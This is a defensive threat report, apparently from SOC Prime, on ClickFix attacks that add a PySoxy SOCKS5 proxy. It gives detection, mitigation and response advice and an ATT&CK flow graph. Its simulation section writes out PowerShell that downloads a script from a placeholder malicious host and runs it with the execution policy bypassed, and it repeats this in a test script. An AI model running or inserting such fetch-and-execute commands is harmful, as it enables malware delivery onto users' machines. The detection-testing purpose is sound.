ClickFix Evolves with PySoxy Proxying

SOC Prime Team

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

ClickFix is a social engineering-based delivery technique that is now being paired with the open-source PySoxy SOCKS5 proxy to create an encrypted secondary access channel. The intrusion begins when a user executes a malicious PowerShell command, which sets up scheduled-task persistence and launches an in-memory PowerShell command-and-control session. After initial reconnaissance, the attacker downloads and runs PySoxy to establish a second encrypted path into the environment. This modular use of interpreter-based tools makes both detection and incident containment more challenging.

Investigation

ReliaQuest observed a single user-driven ClickFix command that launched an obfuscated PowerShell stager, created a scheduled task, performed domain reconnaissance, and later downloaded a compiled Python bytecode file named b64.pyc, which was executed with python.exe. The PowerShell component acted as a lightweight RAT, polling its command-and-control server every three seconds. Researchers also saw the attacker use curl to upload logs and retrieve the PySoxy payload from the same staging server.

Mitigation

Defenders should detect and block suspicious PowerShell launches originating from explorer.exe, monitor for scheduled tasks that execute hidden PowerShell commands, and hunt for Python executions using proxy-related arguments such as -ssl, -remote_ip, and -remote_port. Security teams should also inspect outbound traffic to the identified domains and IP addresses and remove any persisted PowerShell scripts or .pyc files found in ProgramData.

Response

If related indicators are found, isolate the affected host immediately, disable the compromised user account, remove the malicious scheduled task, delete the PowerShell script and PySoxy artifacts, and scan the system for additional remnants. Defenders should also confirm that outbound traffic to the identified infrastructure is blocked and verify that no other persistence mechanisms remain active.

"graph TB %% Class definitions classDef technique fill:#cce5ff %% Node definitions tech_content_injection["Technique – T1659 Content Injection Description: Adversaries inject malicious content into legitimate files or data streams to enable further malicious actions."] class tech_content_injection technique tech_user_exec_malicious_link["Technique – T1204.001 User Execution: Malicious Link Description: Victim clicks a crafted link that launches malicious code."] class tech_user_exec_malicious_link technique tech_user_exec_psh_stager["Technique – T1204 User Execution (PowerShell stager) Description: User runs a PowerShell command that stages additional payloads."] class tech_user_exec_psh_stager technique tech_obf_embedded_payloads["Technique – T1027.009 Obfuscated Files or Information: Embedded Payloads Description: Payloads are hidden or encrypted within other files to evade detection."] class tech_obf_embedded_payloads technique tech_reflective_loading["Technique – T1620 Reflective Code Loading Description: Malicious code is loaded directly into memory using reflective techniques."] class tech_reflective_loading technique tech_scheduled_task["Technique – T1053 Scheduled Task/Job Description: A scheduled task or job is created to execute malicious code for persistence."] class tech_scheduled_task technique tech_user_exec_psh_rat["Technique – T1204 User Execution (inu2011memory PowerShell RAT) Description: User inadvertently runs an inu2011memory PowerShell based remote access tool."] class tech_user_exec_psh_rat technique tech_permission_groups["Technique – T1069 Permission Groups Discovery Description: Adversary enumerates permission groups and memberships on the system."] class tech_permission_groups technique tech_lateral_tool_transfer["Technique – T1570 Lateral Tool Transfer Description: Tools or files are transferred laterally to another host, e.g., via curl upload."] class tech_lateral_tool_transfer technique tech_multistage_channels["Technique – T1104 Multiu2011Stage Channels Description: Additional communication channel is established to download further payloads such as PySoxy."] class tech_multistage_channels technique tech_proxy["Technique – T1090 Proxy Description: Traffic is relayed through a proxy server to hide origin."] class tech_proxy technique tech_proxy_external["Technique – T1090.002 Proxy: External Proxy Description: An external proxy service is used to further conceal commandu2011andu2011control traffic."] class tech_proxy_external technique tech_exfil_alt_proto["Technique – T1048 Exfiltration Over Alternative Protocol Description: Data is exfiltrated using a protocol not typically associated with data transfer."] class tech_exfil_alt_proto technique %% Connections showing attack flow tech_content_injection –>|leads_to| tech_user_exec_malicious_link tech_user_exec_malicious_link –>|leads_to| tech_user_exec_psh_stager tech_user_exec_psh_stager –>|leads_to| tech_obf_embedded_payloads tech_obf_embedded_payloads –>|leads_to| tech_reflective_loading tech_user_exec_psh_stager –>|enables| tech_scheduled_task tech_scheduled_task –>|leads_to| tech_user_exec_psh_rat tech_user_exec_psh_rat –>|leads_to| tech_permission_groups tech_permission_groups –>|leads_to| tech_lateral_tool_transfer tech_lateral_tool_transfer –>|leads_to| tech_multistage_channels tech_multistage_channels –>|leads_to| tech_proxy tech_proxy –>|leads_to| tech_proxy_external tech_proxy_external –>|leads_to| tech_exfil_alt_proto "

Attack Flow

Attack Narrative & Commands:
1. Goal: Establish a PowerShell‑based C2 channel (ClickFix) that downloads a malicious payload from a remote server and executes it stealthily.
2. Method: The attacker launches powershell.exe with the exact flag set the rule monitors (-NoProfile and -ExecutionPolicy Bypass) and uses Invoke-WebRequest to fetch the payload.
3. Why this method: By using native Windows PowerShell and the common Invoke-WebRequest cmdlet, the adversary avoids downloading third‑party tools, reducing the chance of AV detection while matching the known ClickFix behavior captured in the rule.
```
# Step 1: Download the malicious script (simulated as a benign test file)
$url = "http://malicious.example.com/payload.ps1"
$out = "$env:TEMPpayload.ps1"
Invoke-WebRequest -Uri $url -OutFile $out

# Step 2: Execute the downloaded script using the same launch parameters the rule watches
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out
```

Regression Test Script:

# ==============================================
# ClickFix PowerShell C2 Simulation (TC-20260514-3G7ZK)
# ==============================================

# Define variables
$url = "http://malicious.example.com/payload.ps1"
$out = "$env:TEMPpayload.ps1"

# 1. Download a dummy payload (acts as the C2 fetch)
Write-Host "[*] Downloading payload..."
try {
    Invoke-WebRequest -Uri $url -OutFile $out -UseBasicParsing
} catch {
    Write-Error "Download failed: $_"
    exit 1
}

# 2. Execute the payload with the exact flags monitored by the rule
Write-Host "[*] Executing payload with -NoProfile -ExecutionPolicy Bypass"
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out

Write-Host "[+] Simulation complete."
# ==============================================

Cleanup Commands:

# Remove the temporary payload file
if (Test-Path $out) {
    Remove-Item -Path $out -Force
    Write-Host "[*] Payload file removed."
}

# Optionally stop any lingering PowerShell processes launched by the test
Get-Process -Name "powershell" | Where-Object {$_.Path -like "*powershell.exe"} | Stop-Process -Force
Write-Host "[*] Cleanup finished."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free